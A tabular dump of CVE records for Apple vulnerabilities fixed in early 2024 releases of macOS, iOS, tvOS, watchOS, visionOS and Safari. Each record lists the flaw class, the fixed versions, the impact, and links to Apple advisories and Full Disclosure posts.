CVE    2024    23244    Candidate    A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4. An app from a standard user account may be able to escalate privilege after admin user login.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23243    Candidate    A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 17.4 and iPadOS 17.4. An app may be able to read sensitive location information.    FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/18   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081    Assigned (20240112)
CVE    2024    23242    Candidate    A privacy issue was addressed by not logging contents of text fields. This issue is fixed in macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4. An app may be able to view Mail data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23241    Candidate    This issue was addressed through improved state management. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4. An app may be able to leak sensitive user information.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086    Assigned (20240112)
CVE    2024    23240    Candidate    The issue was addressed with improved checks. This issue is fixed in iOS 17.4 and iPadOS 17.4. Shake-to-undo may allow a deleted photo to be re-surfaced without authentication.    MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081    Assigned (20240112)
CVE    2024    23239    Candidate    A race condition was addressed with improved state handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to leak sensitive user information.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23238    Candidate    An access issue was addressed with improved access restrictions. This issue is fixed in macOS Sonoma 14.4. An app may be able to edit NVRAM variables.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23235    Candidate    A race condition was addressed with additional validation. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An app may be able to access user-sensitive data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23234    Candidate    An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to execute arbitrary code with kernel privileges.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23233    Candidate    This issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.4. Entitlements and privacy permissions granted to this app may be used by a malicious app.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23232    Candidate    A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.4. An app may be able to capture a user's screen.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084    Assigned (20240112)
CVE    2024    23231    Candidate    A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6. An app may be able to access user-sensitive data.    CONFIRM:https://support.apple.com/kb/HT214085   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23230    Candidate    This issue was addressed with improved file handling. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to access sensitive user data.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23227    Candidate    This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to read sensitive location information.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23226    Candidate    The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. Processing web content may lead to arbitrary code execution.    MISC:http://seclists.org/fulldisclosure/2024/Mar/21   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/24   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/25   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:http://seclists.org/fulldisclosure/2024/Mar/26   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240112)
CVE    2024    23225    Candidate    A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.    CONFIRM:https://support.apple.com/kb/HT214083   |   CONFIRM:https://support.apple.com/kb/HT214084   |   CONFIRM:https://support.apple.com/kb/HT214085   |   CONFIRM:https://support.apple.com/kb/HT214086   |   CONFIRM:https://support.apple.com/kb/HT214087   |   CONFIRM:https://support.apple.com/kb/HT214088   |   FULLDISC:20240313 APPLE-SA-03-05-2024-1 iOS 17.4 and iPadOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/18   |   FULLDISC:20240313 APPLE-SA-03-05-2024-2 iOS 16.7.6 and iPadOS 16.7.6   |   URL:http://seclists.org/fulldisclosure/2024/Mar/19   |   FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214082   |   URL:https://support.apple.com/en-us/HT214082    Assigned (20240112)
CVE    2024    23224    Candidate    The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.3, macOS Ventura 13.6.4. An app may be able to access sensitive user data.    FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4   |   URL:http://seclists.org/fulldisclosure/2024/Jan/37   |   MISC:https://support.apple.com/en-us/HT214058   |   URL:https://support.apple.com/en-us/HT214058   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23223    Candidate    A privacy issue was addressed with improved handling of files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access sensitive user data.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23222    Candidate    A type confusion issue was addressed with improved checks. This issue is fixed in iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, tvOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.    MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23220    Candidate    The issue was addressed with improved handling of caches. This issue is fixed in visionOS 1.1, iOS 17.4 and iPadOS 17.4. An app may be able to fingerprint the user.    FULLDISC:20240313 APPLE-SA-03-07-2024-7 visionOS 1.1   |   URL:http://seclists.org/fulldisclosure/2024/Mar/26   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214087   |   URL:https://support.apple.com/en-us/HT214087    Assigned (20240112)
CVE    2024    23219    Candidate    The issue was addressed with improved authentication. This issue is fixed in iOS 17.3 and iPadOS 17.3. Stolen Device Protection may be unexpectedly disabled.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059    Assigned (20240112)
CVE    2024    23218    Candidate    A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key.    CONFIRM:https://support.apple.com/kb/HT214082   |   CONFIRM:https://support.apple.com/kb/HT214083   |   CONFIRM:https://support.apple.com/kb/HT214085   |   FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23217    Candidate    A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences.    CONFIRM:https://support.apple.com/kb/HT214085   |   FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23216    Candidate    A path handling issue was addressed with improved validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to overwrite arbitrary files.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-3 macOS Ventura 13.6.5   |   URL:http://seclists.org/fulldisclosure/2024/Mar/22   |   FULLDISC:20240313 APPLE-SA-03-07-2024-4 macOS Monterey 12.7.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/23   |   MISC:https://support.apple.com/en-us/HT214083   |   URL:https://support.apple.com/en-us/HT214083   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214085   |   URL:https://support.apple.com/en-us/HT214085    Assigned (20240112)
CVE    2024    23215    Candidate    An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access user-sensitive data.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
CVE    2024    23214    Candidate    Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5   |   URL:http://seclists.org/fulldisclosure/2024/Jan/34   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061   |   MISC:https://support.apple.com/en-us/HT214063   |   URL:https://support.apple.com/en-us/HT214063    Assigned (20240112)
CVE    2024    23213    Candidate    The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. Processing web content may lead to arbitrary code execution.    FEDORA:FEDORA-2024-97faaca23d   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X2VJMEDT4GL42AQVHSYOT6DIVJDZWIV4/   |   FEDORA:FEDORA-2024-ca3f071aea   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/US43EQFC2IS66EA2CPAZFH2RQ6WD7PKF/   |   FULLDISC:20240126 APPLE-SA-01-22-2024-1 Safari 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/27   |   FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5   |   URL:http://seclists.org/fulldisclosure/2024/Jan/34   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214056   |   URL:https://support.apple.com/en-us/HT214056   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061   |   MISC:https://support.apple.com/en-us/HT214063   |   URL:https://support.apple.com/en-us/HT214063   |   MLIST:[oss-security] 20240206 WebKitGTK and WPE WebKit Security Advisory WSA-2024-0001   |   URL:http://www.openwall.com/lists/oss-security/2024/02/05/8    Assigned (20240112)
CVE    2024    23212    Candidate    The issue was addressed with improved memory handling. This issue is fixed in watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, macOS Ventura 13.6.4, macOS Monterey 12.7.3. An app may be able to execute arbitrary code with kernel privileges.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5   |   URL:http://seclists.org/fulldisclosure/2024/Jan/34   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4   |   URL:http://seclists.org/fulldisclosure/2024/Jan/37   |   FULLDISC:20240126 APPLE-SA-01-22-2024-7 macOS Monterey 12.7.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/38   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214057   |   URL:https://support.apple.com/en-us/HT214057   |   MISC:https://support.apple.com/en-us/HT214058   |   URL:https://support.apple.com/en-us/HT214058   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061   |   MISC:https://support.apple.com/en-us/HT214063   |   URL:https://support.apple.com/en-us/HT214063    Assigned (20240112)
CVE    2024    23211    Candidate    A privacy issue was addressed with improved handling of user preferences. This issue is fixed in watchOS 10.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3. A user's private browsing activity may be visible in Settings.    FULLDISC:20240126 APPLE-SA-01-22-2024-1 Safari 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/27   |   FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-3 iOS 16.7.5 and iPadOS 16.7.5   |   URL:http://seclists.org/fulldisclosure/2024/Jan/34   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   MISC:https://support.apple.com/en-us/HT214056   |   URL:https://support.apple.com/en-us/HT214056   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061   |   MISC:https://support.apple.com/en-us/HT214063   |   URL:https://support.apple.com/en-us/HT214063    Assigned (20240112)
CVE    2024    23210    Candidate    This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user's phone number in system logs.    FULLDISC:20240126 APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/33   |   FULLDISC:20240126 APPLE-SA-01-22-2024-5 macOS Sonoma 14.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/36   |   FULLDISC:20240126 APPLE-SA-01-22-2024-8 watchOS 10.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/39   |   FULLDISC:20240126 APPLE-SA-01-22-2024-9 tvOS 17.3   |   URL:http://seclists.org/fulldisclosure/2024/Jan/40   |   MISC:https://support.apple.com/en-us/HT214055   |   URL:https://support.apple.com/en-us/HT214055   |   MISC:https://support.apple.com/en-us/HT214059   |   URL:https://support.apple.com/en-us/HT214059   |   MISC:https://support.apple.com/en-us/HT214060   |   URL:https://support.apple.com/en-us/HT214060   |   MISC:https://support.apple.com/en-us/HT214061   |   URL:https://support.apple.com/en-us/HT214061    Assigned (20240112)
